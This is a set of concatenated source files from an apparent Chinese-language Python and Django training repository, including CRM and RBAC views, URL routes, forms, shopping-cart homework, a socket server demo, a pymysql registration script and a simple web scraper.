'商品管理', 'icon': 'fa-clipboard', 'class':'hide', 'children': [ {'title': '订单列表', 'url': '/app01/order/', 'name': 'order'}, {'title': '个人中心', 'url': '/app01/certer/', 'name': 'center'} ] } } """ for k,v in menu_dict.items(): for child in v['children']: name = child['name'] if request.default_selected_menu_name == name: child['class'] = 'active' # 菜单默认被选中,并显示 v['class'] = '' return {'menus': list(menu_dict.values()) }<file_sep>/day2/作业终版购物车.py #博客地址 http://www.cnblogs.com/huningfei/ goods = [{"name": "电脑", "price": 1999}, {"name": "鼠标", "price": 10}, {"name": "游艇", "price": 20}, {"name": "美女", "price": 998},] shopping_list = [] money = int(input("请输入你的金额:").strip()) print("商品列表") while True: for i in range (len(goods)): print(i,goods[i]["name"],goods[i]["price"]) ##打印商品列表 num = input("请输入你想购买的商品ID,退出请按q:").strip() if not num: print("请重新输入:") continue if num.isdigit(): num = int(num) buy_num = input("请输入你想要购买的个数:").strip() if not buy_num: print ("请重新输入数字:") continue if buy_num.isdigit(): buy_num = int(buy_num) if (goods[num]["price"] * buy_num) < money: ##如果价钱小于你的金额就购买成功 print ("你已经购买成功") a = 1 while a <= buy_num: ##循环购买的个数,然后加入到新的列表里面 shopping_list.append({"name": goods[num]["name"],"price": goods[num]["price"],"num":buy_num}) print(shopping_list) a += 1 money = money - (goods[num]["price"] * buy_num) ##计算余额 价钱乘以个数 print("余额: %s" %(money)) choice = input("你还想继续购买吗,请按y,否则请按q:").strip() if choice == "y" or choice == "Y": continue else: ##如果不想购买则打印订单和消费金额 money = 0 for j in range(len(shopping_list)): ##去循环新的列表 print ("订单%s: %s %s元" % (j+1,shopping_list[j]["name"],shopping_list[j]["price"])) money = money + shopping_list[j]["price"] print("一共消费:%s" % (money)) break else: print("余额不足") if num == "q" or num == "Q": print("你没有购买任何商品,谢谢光临!") break <file_sep>/day27/s21crm/crm/views/school.py from django.shortcuts import render, redirect from crm import models from crm.forms.school import SchoolModelForm from django.urls import reverse def school_list(request): """ 部门列表 :param request: :return: """ queryset = models.School.objects.all() return render(request, 'school_list.html', {'queryset': queryset}) def school_add(request): """ 部门添加 :param request: :return: """ if request.method == "GET": form = SchoolModelForm() return render(request, 'school_add.html', {'form': form}) form = SchoolModelForm(data=request.POST) if form.is_valid(): form.save() return redirect('school_list') else: return render(request, 'school_add.html', {'form': form}) def school_edit(request, nid): """ 编辑部门 :param request: :param nid: :return: """ obj = models.School.objects.filter(id=nid).first() if request.method == "GET": form = SchoolModelForm(instance=obj) # 加上instance才能在编辑页面显示原来的数据 return render(request, 'school_edit.html', {"form": form}) form = SchoolModelForm(data=request.POST, instance=obj) # data是把编辑好的数据提交过去 if form.is_valid(): form.save() return redirect('school_list') else: return render(request, 'school_edit.html', {"form": form}) def school_del(request, nid): """ 删除用户 :param request: :param nid: :return: """ models.School.objects.filter(id=nid).delete() return redirect('school_list') <file_sep>/day27/s21crm/s21crm/urls.py """s21crm URL Configuration The `urlpatterns` list routes URLs to views. For more information please see: https://docs.djangoproject.com/en/1.11/topics/http/urls/ Examples: Function views 1. Add an import: from my_app import views 2. Add a URL to urlpatterns: url(r'^$', views.home, name='home') Class-based views 1. Add an import: from other_app.views import Home 2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home') Including another URLconf 1. Import the include() function: from django.conf.urls import url, include 2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls')) """ from django.conf.urls import url from django.contrib import admin from crm.views import depart from crm.views import userinfo from crm.views import course from crm.views import school from crm.views import classes from crm.views import public from crm.views import private from crm.views import login from crm.views import logout from crm.views import record from rbac.views import menu from rbac.views import permission from rbac.views import role urlpatterns = [ url(r'^admin/', admin.site.urls), url(r'^login/', login.login, name="login"), url(r'^logout/', login.logout, name="logout"), url(r'^index/', login.index, name="index"), # 部门 url(r'^depart/list/', depart.depart_list, name='depart_list'), url(r'^depart/add/', depart.depart_add, name='depart_add'), url(r'^depart/edit/(\d+)', depart.depart_edit, name='depart_edit'), url(r'^depart/del/(\d+)', depart.depart_del, name='depart_del'), # 用户 url(r'^user/list/', userinfo.user_list, name='user_list'), url(r'^user/add/', userinfo.user_add, name='user_add'), url(r'^user/edit/(\d+)/', userinfo.user_edit, name='user_edit'), url(r'^user/del/(\d+)/', userinfo.user_del, name='user_del'), # 课程 url(r'^course/list/', course.course_list, name='course_list'), url(r'^course/add/', course.course_add, name='course_add'), url(r'^course/edit/(\d+)/', course.course_edit, name='course_edit'), url(r'^course/del/(\d+)', course.course_del, name='course_del'), # 学校 url(r'^school/list/', school.school_list, name='school_list'), url(r'^school/add/', school.school_add, name='school_add'), url(r'^school/edit/(\d+)', school.school_edit, name='school_edit'), url(r'^school/del/(\d+)', school.school_del, name='school_del'), # 班级 url(r'^classes/list/', classes.classes_list, name='classes_list'), url(r'^classes/add/', classes.classes_add, name='classes_add'), url(r'^classes/edit/(\d+)', classes.classes_edit, name='classes_edit'), url(r'^classes/del/(\d+)', classes.classes_del, name='classes_del'), # 公户管理 url(r'^public/custom/list/', public.public_customer_list, name='public_customer_list'), url(r'^public/custom/add/', public.public_customer_add, name='public_customer_add'), url(r'^public/custom/edit/(\d+)', public.public_customer_edit, name='public_customer_edit'), url(r'^public/custom/del/(\d+)', public.public_customer_del, name='public_customer_del'), # 私户管理 url(r'^private/custom/list/', private.private_customer_list, name='private_customer_list'), url(r'^private/custom/add/', private.private_customer_add, name='private_customer_add'), url(r'^private/custom/edit/(\d+)', private.private_customer_edit, name='private_customer_edit'), # 跟进记录 url(r'^record/list/(\d+)/', record.record_list, name='record_list'), url(r'^record/add/(\d+)/', record.record_add, name='record_add'), # 菜单 url(r'^menu/list/', menu.menu_list, name='menu_list'), url(r'^menu/add/', menu.menu_add, name='menu_add'), url(r'^menu/edit/(\d+)/', menu.menu_edit, name='menu_edit'), url(r'^menu/del/(\d+)/', menu.menu_del, name='menu_del'), # 权限 url(r'^permission/list/', permission.permission_list, name='permission_list'), url(r'^permission/add/', permission.permission_add, name='permission_add'), url(r'^permission/edit/(\d+)/', permission.permission_edit, name='permission_edit'), url(r'^permission/del/(\d+)/', permission.permission_del, name='permission_del'), # 角色 url(r'^role/list/', role.role_list, name='role_list'), url(r'^role/add/', role.role_add, name='role_add'), url(r'^role/edit/(\d+)/', role.role_edit, name='role_edit'), url(r'^role/del/(\d+)/', role.role_del, name='role_del'), ] <file_sep>/day27/s21crm/crm/views/course.py from django.shortcuts import render, redirect from crm import models from crm.forms.course import CourseModelForm from django.urls import reverse def course_list(request): """ 部门列表 :param request: :return: """ queryset = models.Course.objects.all() return render(request, 'course_list.html', {'queryset': queryset}) def course_add(request): """ 部门添加 :param request: :return: """ if request.method == "GET": form = CourseModelForm() return render(request, 'course_add.html', {'form': form}) form = CourseModelForm(data=request.POST) if form.is_valid(): form.save() return redirect('course_list') else: return render(request, 'course_add.html', {'form': form}) def course_edit(request, nid): """ 编辑部门 :param request: :param nid: :return: """ obj = models.Course.objects.filter(id=nid).first() if request.method == "GET": form = CourseModelForm(instance=obj) # 加上instance才能在编辑页面显示原来的数据 return render(request, 'course_edit.html', {"form": form}) form = CourseModelForm(data=request.POST, instance=obj) # data是把编辑好的数据提交过去 if form.is_valid(): form.save() return redirect('course_list') else: return render(request, 'course_edit.html', {"form": form}) def course_del(request, nid): """ 删除用户 :param request: :param nid: :return: """ models.Course.objects.filter(id=nid).delete() return redirect('course_list') <file_sep>/day2/作业1.py goods = [{"name": "电脑", "price": 1999}, {"name": "鼠标", "price": 10}, {"name": "游艇", "price": 20}, {"name": "美女", "price": 998},] new_list=[] b = 1 for v in goods: #去循环goods列表然后给加入id v['id'] = b b+=1 #print (goods) salry = input ("请输入你的金额:") while True: for i in goods: print ( str(i.get("id"))+"\t"+i.get("name") + "\t" + str(i.get("price"))) m = input ("请输入你要购买的商品序号:").strip() if not m.isdigit() or m == '': print ("您输入的不是数字,请重新输入:") continue num = input("请输入你想要购买的个数:").strip() if not num.isdigit(): print ("请输入数字:") continue for j in goods: ##把你上面购买的商品加入到一个新的列表里 if int(m) == j.get('id'): new_list.append((j.get('name'),j.get('price'),int(num))) for v in new_list: #去循环新的列表然后打印出数量和价格 c=v[1] * v[2] ##数量乘以金额 yue=int(salry) - int(c) #print (yue) if yue < 0: print ("你的余额不足:") else: print ("你一共花费{}元,还剩{}元".format(c,yue)) break <file_sep>/day27/s21crm/rbac/service/permission.py from django.conf import settings def init_permission(user,request): """ 用户初始化,将权限信息和菜单信息放入session中。 :param user: 当前登录的用户对象 :param request: 请求相关的所有数据 :return: """ permission_menu_list = user.roles.filter(permissions__isnull=False).distinct().values( 'permissions__title', 'permissions__url', 'permissions__name', 'permissions__menu_id', # 菜单相关 'permissions__menu__title', 'permissions__menu__icon', 'permissions__parent_id', # 父权限相关 'permissions__parent__name' ) # 2.3 获取当前用户拥有的所有权限信息 + 获取当前用户拥有的所有权限信息 permission_dict = {} menu_dict = {} for item in permission_menu_list: # 添加权限字典中 name = item['permissions__name'] url = item['permissions__url'] menu_id = item['permissions__menu_id'] parent_name = item['permissions__parent__name'] permission_dict[name] = {'url': url, 'menu_id': menu_id, 'parent_name': parent_name} # 添加到菜单字典中(只要可以成为菜单的权限) if menu_id: menu_id = item['permissions__menu_id'] if menu_id in menu_dict: menu_dict[menu_id]['children'].append( {'title': item['permissions__title'], 'url': item['permissions__url'], 'name': item['permissions__name']}) else: menu_dict[menu_id] = { 'title': item['permissions__menu__title'], 'icon': item['permissions__menu__icon'], 'class': 'hide', 'children': [ {'title': item['permissions__title'], 'url': item['permissions__url'], 'name': item['permissions__name']} ] } request.session[settings.RBAC_PERMISSION_SESSION_KEY] = permission_dict request.session[settings.RBAC_MENU_SESSION_KEY] = menu_dict<file_sep>/day8/sockerserver/my_socker_server.py import time import socketserver class Myserver(socketserver.BaseRequestHandler): def handle(self): conn=self.request print(conn) time.sleep(1) conn.send(b'hello') time.sleep(1) conn.send(b'world') myserver=socketserver.ThreadingTCPServer(('127.0.0.1',9000),Myserver) myserver.serve_forever()<file_sep>/day23/auto - 2 - 固定二级菜单示例/web/forms.py from django import forms from web import models class UserForm(forms.Form): name = forms.CharField( max_length=12, min_length=2, # 如果想让网页显示中文就加上label label="用户名", error_messages={'required': '请输入用户名'}, # 给tttle生成的input标签加上一个class类 widget=forms.widgets.TextInput(attrs={"class": "form-control"}) ) <file_sep>/day15/作业/core/register.py from conf import setting from core import loging import pymysql log=loging.mylog() # 注册函数 def register(): conn = pymysql.connect(host=(setting.host), user=(setting.user), password=(setting.password), database=(setting.database), charset=(setting.charset)) cursor = conn.cursor() count = 0 while count < 3: count += 1 user = input('用户名:').strip() pwd = input('密码:').strip() sql2 = "select * from t1 where user=%s" res2 = cursor.execute(sql2, [user]) # 执行sql语句,返回sql查询成功的记录数目 if res2: print('用户名已存在') log.warning('用户名已经存在') else: # 执行完毕返回的结果集默认以元组显示 sql = "insert into t1(user,pwd) values (%s,%s)" res = cursor.execute(sql, [user, pwd]) # 执行sql语句,返回sql查询成功的记录数目 if res: print('注册成功') log.info('注册成功') conn.commit() quit() else: print('注册失败') log.error("注册失败") continue cursor.close() conn.close() <file_sep>/复习/正则和re模块.py import re ret = re.findall('a','bac agon yuan') print(ret)<file_sep>/day19/form/app01/forms.py from django import forms from app01 import models from django.core.exceptions import ValidationError #注册功能 from django.core.validators import RegexValidator # 检验手机号码是否正确 # 自己定义一个form类 class BookForm(forms.Form): title=forms.CharField( max_length=12, min_length=2, # 如果想让网页显示中文就加上label label="书名", initial="填写书名", # 给tttle生成的input标签加上一个class类 widget=forms.widgets.TextInput(attrs={"class":"form-control"}) ) publisher_date=forms.DateField( label="出版日期", # widget 插件 widget=forms.widgets.DateInput(attrs={"type":"date","class":"form-control"}) ) phone=forms.CharField( max_length=11, validators=[RegexValidator(r'^1[356789]\d{9}$',"手机号码格式不正确")], # 限制手机号格式 widget = forms.widgets.TextInput(attrs={"class": "form-control"}) ) # 用modelchoicefield可以实时显示到页面上面当数据库增加的时候 publisher = forms.ModelChoiceField( queryset=models.Publisher.objects.all(), widget=forms.widgets.Select(attrs={"class": "form-control"}), ) authors=forms.ModelMultipleChoiceField( queryset=models.Author.objects.all(), widget=forms.widgets.SelectMultiple(attrs={"class": "form-control"}) ) #自定义一个局部钩子函数含有alex的关键字不能提交 def clean_title(self): value=self.cleaned_data.get("title") #获取书名 if "alex" in value: raise ValidationError("ALEX以备和谐") else: return value <file_sep>/deploy/web/views/account.py from django.shortcuts import render, HttpResponse, redirect from django.urls import reverse from web import models from web.utils.check_code import gen_check_code from io import BytesIO def login(request): """ 用户登录 :param request: :return: """ import random data = random.randint(1000, 9999) if request.method == 'GET': return render(request, 'login.html', {'data': data}) code = request.POST.get('code') # 获取网页上面显示的验证码 check_code = request.session.get('check_code') # 用户输入的验证码 if not code: return render(request, 'login.html', {'error': '请输入验证码'}) if code.upper() != check_code.upper(): return render(request, 'login.html', {'error': '验证码错误'}) user = request.POST.get('username') pwd = request.POST.get('<PASSWORD>') user_object = models.UserInfo.objects.filter(username=user, password=pwd).first() if not user_object: return render(request, 'login.html', {'error': '用户名或密码错误'}) request.session['user_id'] = user_object.id # 登录成功之后将用户信息保存到session里面 return redirect(reverse('project_list')) # 引用gen_check_code,生成验证码 def check_code(request): img, code = gen_check_code() obj = BytesIO() print(obj.getvalue()) img.save(obj, format='png') request.session['check_code'] = code # 将验证码保存到session里面 return HttpResponse(obj.getvalue()) <file_sep>/day22/teplate_about/app01/views.py from django.shortcuts import render # Create your views here. import datetime def index(request): now=datetime.datetime.now() print(now,type(now)) return render(request,"index.html",{"now":now})<file_sep>/day4/优秀的作业/优秀的作业/马珺浩/day04作业_马珺浩/员工信息数据库/员工信息数据库.py ''' 文件存储格式如下: id,name,age,phone,job 1,Alex,22,13651054608,IT 2,Egon,23,13304320533,Tearcher 3,nezha,25,1333235322,IT 现在需要对这个员工信息文件进行增删改查。 基础必做: a.可以进行查询,支持三种语法: select 列名1,列名2,… where 列名条件 支持:大于小于等于,还要支持模糊查找。 示例: select name, age where age>22 select * where job=IT select * where phone like 133 进阶选做: b.可创建新员工记录,id要顺序增加c.可删除指定员工记录,直接输入员工id即可 d.修改员工信息 语法:set 列名=“新的值” where 条件 #先用where查找对应人的信息,再使用set来修改列名对应的值为“新的值” 注意:要想操作员工信息表,必须先登录,登陆认证需要用装饰器完成 其他需求尽量用函数实现 ''' __author__ = '<NAME>' from prettytable import PrettyTable # 首先定义一个字典,记录当前用户登录状态 verify_status = {'name': None, 'status': None} pwd_dic = {} # 定义装饰器,操作前验证用户是否登录 # staff_pwd为密码本 def verify(func): def inner(*args, **kwargs): if verify_status['name'] and verify_status['status']: return func(*args, **kwargs) else: with open('staff_pwd', 'r', encoding='utf-8') as f_read: line = f_read.read().split('\n') for msg in line: pwd_dic[msg.split()[0]] = msg.split()[1] name = input('Please input your name:').strip() pwd = input('Please input your password:').strip() if name in pwd_dic: if pwd == pwd_dic[name]: verify_status['name'] = name verify_status['status'] = True return func(*args, **kwargs) else: pass return inner # 登录方式1 def login1(): cmd_inp_list = cmd_inp.split() if '-u' in cmd_inp_list and '-p' in cmd_inp_list and len(cmd_inp.split()) == 5: name_num = cmd_inp_list.index('-u') + 1 pwd_num = cmd_inp_list.index('-p') + 1 with open('staff_pwd', encoding='utf-8') as f_read: line = f_read.read().split('\n') for msg in line: pwd_dic[msg.split()[0]] = msg.split()[1] if cmd_inp_list[name_num] in pwd_dic: if cmd_inp_list[pwd_num] == pwd_dic[cmd_inp_list[name_num]]: verify_status['name'] = cmd_inp_list[name_num] verify_status['status'] = True print('Login successful!') else: print('Error input!') # 语法纠正:不论输入命令行结尾有没有‘;’,都在源码中先删掉,方便取值 def grammar(sent): if sent.endswith(';'): sent = sent[:len(sent) - 1] else: sent = sent return sent # select语法函数 def select(func): inp_list = func.split() # 列名查找 if len(inp_list) == 4 and inp_list[2] == 'where': with open('员工信息.txt', encoding='utf-8') as f_read: # [id,name,age,phone,job] line_title = f_read.readline()[:-1].split(',') # 选择的元素为全局 if '*' in inp_list[1]: sel_table = PrettyTable(line_title) f_read.seek(31) msg_lis = f_read.read().split('\n') for line in msg_lis: # 遍历所有列表,并列表形式切割 line_lis_all = line.split(',') # 筛选有用的元素,首先将判断语句摘出来 cond_sent = inp_list[3] if '>' in cond_sent: cond_lis = cond_sent.split('>') cond_ele = cond_lis[0] cond_val = cond_lis[1] cond_ele_num = line_title.index(cond_ele) if line_lis_all[cond_ele_num] > cond_val: sel_table.add_row(line_lis_all) if '<' in cond_sent: cond_lis = cond_sent.split('<') cond_ele = cond_lis[0] cond_val = cond_lis[1] cond_ele_num = line_title.index(cond_ele) if line_lis_all[cond_ele_num] < cond_val: sel_table.add_row(line_lis_all) if '=' in cond_sent: cond_lis = cond_sent.split('=') cond_ele = cond_lis[0] cond_val = cond_lis[1] cond_ele_num = line_title.index(cond_ele) if cond_val == line_lis_all[cond_ele_num]: sel_table.add_row(line_lis_all) print(sel_table) # 选择元素为多元素 # and后是为避免输错元素拼写而报错设置 if ',' in inp_list[1] and set(inp_list[1].split(',')) < set(line_title): # 筛选select后的元素列表 ele_lis = inp_list[1].split(',') sel_table = PrettyTable(ele_lis) # 将判断语句筛选出来 cond_sent = inp_list[3] num_lis = [] # 将select后的多元素的索引值,存入一个列表备用 for ele in ele_lis: num_lis.append(line_title.index(ele)) f_read.seek(31) # 标题后的所有数据,以每行列表的形式取出 msg_lis = f_read.read().split('\n') # 逐行判断,并把一行的值转换成一个列表line_lis_all for line in msg_lis: line_lis_all = line.split(',') # 所有类型都在 line_lis_need = [] if '>' in cond_sent: cond_lis = cond_sent.split('>') cond_ele = cond_lis[0] # 类型 cond_val = cond_lis[1] # 值 cond_ele_num = line_title.index(cond_ele) # 根据类型找出该值在line_lis_all的索引 if line_lis_all[cond_ele_num] > cond_val: # 判断,如果True: for num in num_lis: # 开始索引取值,取值取的是select的多元素类型 line_lis_need.append(line_lis_all[num]) # 只筛选要的值 sel_table.add_row(line_lis_need) # 添加到表中 if '<' in cond_sent: cond_lis = cond_sent.split('<') cond_ele = cond_lis[0] cond_val = cond_lis[1] cond_ele_num = line_title.index(cond_ele) if line_lis_all[cond_ele_num] < cond_val: for num in num_lis: line_lis_need.append(line_lis_all[num]) sel_table.add_row(line_lis_need) if '=' in cond_sent: cond_lis = cond_sent.split('=') cond_ele = cond_lis[0] cond_val = cond_lis[1] cond_ele_num = line_title.index(cond_ele) if line_lis_all[cond_ele_num] == cond_val: for num in num_lis: line_lis_need.append(line_lis_all[num]) sel_table.add_row(line_lis_need) print(sel_table) # 选择元素为单一元素 else: if inp_list[1] in line_title: # ele_lis用作打印表格title ele_lis = [] ele_lis.append(inp_list[1]) # ele_lis_num用于索引表的元素 ele_lis_num = line_title.index(inp_list[1]) sel_table = PrettyTable(ele_lis) f_read.seek(31) msg_lis = f_read.read().split('\n') for line in msg_lis: line_lis_all = line.split(',') line_lis_need = [] cond_sent = inp_list[3] if '>' in cond_sent: cond_lis = cond_sent.split('>') cond_ele = cond_lis[0] cond_val = cond_lis[1] cond_ele_num = line_title.index(cond_ele) if line_lis_all[cond_ele_num] > cond_val: line_lis_need.append(line_lis_all[ele_lis_num]) sel_table.add_row(line_lis_need) if '<' in cond_sent: cond_lis = cond_sent.split('<') cond_ele = cond_lis[0] cond_val = cond_lis[1] cond_ele_num = line_title.index(cond_ele) if line_lis_all[cond_ele_num] < cond_val: line_lis_need.append(line_lis_all[ele_lis_num]) sel_table.add_row(line_lis_need) if '=' in cond_sent: cond_lis = cond_sent.split('=') cond_ele = cond_lis[0] cond_val = cond_lis[1] cond_ele_num = line_title.index(cond_ele) if line_lis_all[cond_ele_num] == cond_val: line_lis_need.append(line_lis_all[ele_lis_num]) sel_table.add_row(line_lis_need) print(sel_table) # 模糊查找 if len(inp_list) == 6 and inp_list[2] == 'where' and inp_list[4] == 'like': with open('员工信息.txt', 'r', encoding='utf-8') as f_read: # [id,name,age,phone,job] line_title = f_read.readline()[:-1].split(',') # 选择元素为全局 if '*' in inp_list[1]: sel_table = PrettyTable(line_title) if inp_list[3] in line_title: # 索引关键字位置 num_word = line_title.index(inp_list[3]) f_read.seek(31) msg_lis = f_read.read().split('\n') # 多行 for line in msg_lis: word_lis = line.split(',') # 对应值 if inp_list[5] in word_lis[num_word]: sel_table.add_row(word_lis) print(sel_table) # 选择元素为多元素 # and后是为避免输错元素拼写而报错设置 if ',' in inp_list[1] and set(inp_list[1].split(',')) < set(line_title): # 只打印选定的元素 ele_lis = inp_list[1].split(',') sel_table = PrettyTable(ele_lis) # 索引选定值的位置存入列表 ele_num_lis = [] for ele_word in ele_lis: ele_num_lis.append(line_title.index(ele_word)) if inp_list[3] in line_title: # 索引关键字位置 num_word = line_title.index(inp_list[3]) f_read.seek(31) msg_lis = f_read.read().split('\n') for line in msg_lis: word_lis = line.split(',') word_print_lis = [] if inp_list[5] in word_lis[num_word]: # 按之前找好的选定元素找对应值 for ele_num in ele_num_lis: word_print_lis.append(word_lis[ele_num]) sel_table.add_row(word_print_lis) print(sel_table) # 选择元素为单一元素 else: if inp_list[1] in line_title: title_print = [] title_print.append(inp_list[1]) sel_table = PrettyTable(title_print) # 索引选定制的位置并记录 ele_num = line_title.index(inp_list[1]) if inp_list[3] in line_title: # 索引关键字位置 num_word = line_title.index(inp_list[3]) f_read.seek(31) msg_lis = f_read.read().split('\n') for line in msg_lis: word_lis = line.split(',') word_print_lis = [] if inp_list[5] in word_lis[num_word]: word_print_lis.append(word_lis[ele_num]) sel_table.add_row(word_print_lis) print(sel_table) # insert语法函数,属于添加员工信息表,需验证登陆登陆状态 @verify def insert(func): inp_lis = func.split() with open('员工信息.txt', 'r', encoding='utf-8') as f_read: pass # 主程序开始 while True: login_flag = True while login_flag: cmd_inp = input('[root@foundation ~]# ').strip() if len(cmd_inp) != 0 and cmd_inp.split()[0] == 'mysql': # 以mysql -u [username] -p [password]的方式进入 if len(cmd_inp.split()) > 1: login1() if verify_status['status']: login_flag = False # 直接进入mysql,用户、登录状态空 if len(cmd_inp.split()) == 1: login_flag = False sql_flag = True while sql_flag: sql_cmd = input('>>>>:').strip() sql_cmd = grammar(sql_cmd) # 浏览整个数据库数据 if sql_cmd == 'show database': with open('员工信息.txt', encoding='utf-8') as f_read: table = PrettyTable(f_read.readline().split(',')) msg = f_read.read().split('\n') for line in msg: table.add_row(line.split(',')) print(table) if len(sql_cmd) != 0 and sql_cmd.split()[0] == 'select': select(sql_cmd) if len(sql_cmd) != 0 and sql_cmd.split()[0] == 'delete': pass if len(sql_cmd) != 0 and sql_cmd.split()[0] == 'insert': insert(sql_cmd) if len(sql_cmd) != 0 and sql_cmd.split()[0] == 'set': pass # 退出数据库时注销当前用户登录状态 if sql_cmd == 'exit': sql_flag = False login_flag = True verify_status['name'] = None verify_status['status'] = None <file_sep>/day25/爬取多个页面.py import requests import ssl # 需求:爬取搜狗知乎指定词条指定页码下的页面数据 headers = { # 对UA进行重写操作(伪装) 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64)AppleWebKit/537.36(KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36' } url = 'http://zhihu.sogou.com/zhihu?' word = input('enter a word:') start_page = int(input('enter a start page:')) end_page = int(input('enter a end page:')) for page in range(start_page, end_page + 1): param = { 'query': word, 'page': str(page) # 请求携带的参数必须为str } response = requests.get(url=url, params=param, headers=headers, proxies={"https": '192.168.127.12:8080'}) print(response.url) page_text = response.text file_name = word + str(page) + ".html" # 文件名字为word+数字 with open(file_name, 'w', encoding='utf-8') as fp: print('爬去到了第%d页的页面数据' % page) fp.write(page_text) <file_sep>/deploy/web/views/script.py from django.shortcuts import render,HttpResponse,redirect from web.forms.script import ScriptModelForm from web import models from web.utils.pager import Pagination from web.utils.urls import memory_reverse def script_list(request): """ 列表 :param request: :return: """ # 要查看的页码 page = request.GET.get('page', 1) # 数据库中数据总条数 total_count = models.Script.objects.all().count() # 数据库中获取即可 pager = Pagination(page,total_count,request.path_info) depart_queryset = models.Script.objects.all()[pager.start :pager.end] return render(request,'script_list.html',{'depart_queryset':depart_queryset,'pager':pager}) def script_add(request): """ 添加 :param request: :return: """ if request.method == 'GET': form = ScriptModelForm() return render(request, 'form.html', {'form':form}) form = ScriptModelForm(data=request.POST) # 对用户提交的数据进行校验 if form.is_valid(): form.save() return redirect(memory_reverse(request,'script_list')) return render(request, 'form.html', {'form': form}) def script_edit(request,nid): """ 编辑 :param request: :param nid: 当前要编辑的部门ID :return: """ obj = models.Script.objects.filter(id=nid).first() # 包含此行的所有数据 if request.method == "GET": # 生成HTML标签 + 携带默认值 form = ScriptModelForm(instance=obj) return render(request,'form.html',{'form':form}) # 带默认值 form = ScriptModelForm(data=request.POST,instance=obj) if form.is_valid(): form.save() return redirect(memory_reverse(request,'script_list')) return render(request, 'form.html', {'form': form}) def script_del(request,nid): """ 删除 :param request: :param nid: :return: """ origin = memory_reverse(request,'script_list') if request.method == 'GET': return render(request, 'delete.html', {'cancel': origin}) models.Script.objects.filter(id=nid).delete() return redirect(origin)<file_sep>/day2/编码.py #对于英文 s = 'laonanhai' print(s,type(s)) s1 = b'laonanhai' print(s1,type(s1)) #对于中文: s = '中国' print(s,type(s)) s1 = b'\xe4\xb8\xad\xe5\x9b\xbd' print(s1,type(s1))<file_sep>/day13/轮播/小米轮播图/3.js $(function () { // function yuandian() { // for (var i=0;i < $(".gradan .ui-pager-item").length;i++){ // if ($(".gradan.ui-pager-item").eq(i).css('background','white')); // $(".ui-pager-item a").eq(i+1).css('background','white').siblings().css('background','#666'); // $("img").eq(i).addClass("hide").siblings().removeClass("hide"); // // // } // // } // $('.gradan').click(function () { // clearInterval(down); // yuandian() // // }); function next() { // var img=document.getElementsByClassName('lunbo'); for (var i = 0; i < $(".there-right img").length; i++) { if ($(".there-right img").eq(i).hasClass("hide")) { if (i == 5) { i = -1 } $(".there-right img").eq(i + 1).addClass("hide").siblings().removeClass("hide"); $(".ui-pager-item a").eq(i+1).css('background','red').siblings().css('background','#666'); // $(".ui-pager-item a").eq(i+1).addClass("gradan ui-pager-item a").siblings().removeClass("gradan ui-pager-item a"); return } } } function prev() { for (var i = 5; i >= 0; i--) { if ($(".there-right img").eq(i).hasClass("hide")) { if (i == 0) { i = 6 } $(".there-right img").eq(i - 1).addClass("hide").siblings().removeClass("hide"); $(".ui-pager-item a").eq(i-1).css('background','white').siblings().css('background','#666'); return } } } var down = setInterval(next, 3000); $(".ui-next").click(function () { clearInterval(down); next(); }); $(".ui-prev").click(function () { clearInterval(down); prev(); }); });<file_sep>/day18/练习/练习/urls.py """练习 URL Configuration The `urlpatterns` list routes URLs to views. For more information please see: https://docs.djangoproject.com/en/1.11/topics/http/urls/ Examples: Function views 1. Add an import: from my_app import views 2. Add a URL to urlpatterns: url(r'^$', views.home, name='home') Class-based views 1. Add an import: from other_app.views import Home 2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home') Including another URLconf 1. Import the include() function: from django.conf.urls import url, include 2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls')) """ from django.conf.urls import url from django.contrib import admin from app01 import views urlpatterns = [ # url(r'^admin/', admin.site.urls), # session 验证 url(r'^login/$', views.login), url(r'^index/$', views.index), url(r'^secode/$', views.secode), # 分页功能 url(r'^book_list/$', views.book_list), url(r'^publisher_list/$', views.publisher_list), # 中间件 url(r'^test/$', views.test), # orm多对多 url(r'^author_list/$',views.author_list), url(r'^add_author/$',views.Addauthor.as_view()), # 编辑 url(r'^edit_author/(\d+)/$',views.Editauthor.as_view()), # 删除 url(r'^del_author/(\d+)/$',views.del_author), # ajax url(r'^ajax_test/$',views.ajax_test), url(r'^calc/$',views.calc), # 注册 url(r'^reg/$',views.reg), url(r'^check_username/$',views.check_username), ] <file_sep>/day18/练习/app01/views.py from django.shortcuts import render, redirect, HttpResponse from functools import wraps from app01 import models import mypage from django import views # Create your views here. def login_check(func): @wraps(func) def inner(request, *args, **kwargs): next = request.path_info # 登录验证 # 取Session v = request.session.get("s21") if v == "hao": return func(request, *args, **kwargs) else: return redirect("/login/?next={}".format(next)) return inner # 登录 session验证 def login(request): if request.method == "POST": next = request.GET.get("next") username = request.POST.get("username") pwd = request.POST.get("pwd") if username == "alex" and pwd == "123": if next: rep = redirect(next) else: rep = redirect("/secode/") request.session["s21"] = "hao" request.session.set_expiry(70) return rep else: return HttpResponse("走吧") else: return render(request, "login.html") @login_check def index(request): return render(request, "index.html") @login_check def secode(request): return render(request, "secode.html") # 分页 def book_list(request): book = models.Book.objects.all() total_count = book.count() current_page = request.GET.get("page") # 分页功能开始 page_boj = mypage.MyPage(current_page, total_count, url_prefix="book_list") data = book[page_boj.start:page_boj.end] # 从第几页显示到第几页 page_html = page_boj.page_html() # 页面 page_num = page_boj.num() # 序号 return render(request, "book_list.html", {"book": data, "page_html": page_html, "num": page_num}) # # 查找所有书籍 # books = models.Book.objects.all() # # 拿到总数据量 # total_count = books.count() # # 每一页显示多少条数据 # per_page = 10 # # 页面最多显示多少页码 # max_show = 7 # # 最多显示页码数的一半 # half_show = max_show // 2 # 地板除,没有余数 # # 从url拿到page参数 # current_page = request.GET.get("page") # try: # current_page = int(current_page) # except Exception as e: # # 如果输入的页面有误默认显示第一页 # current_page = 1 # # 求总共需要多少页显示,总数据除以每页显示多少条 # total_page, more = divmod(total_count, per_page) # if more: # 代表有余数 # total_page += 1 # 需要在增加一个页码,才可以显示 # # 如果输入的当前页码大于总数据的页码 # if current_page > total_page: # current_page = total_page # # 计算一下,显示页码的起点和终点分别是多少 # show_page_start = current_page - half_show # show_page_end = current_page + half_show # # 当前页码 - half_show <=0 # if current_page - half_show <= 0: # show_page_start = 1 # show_page_end = max_show # # 当前页码数 + 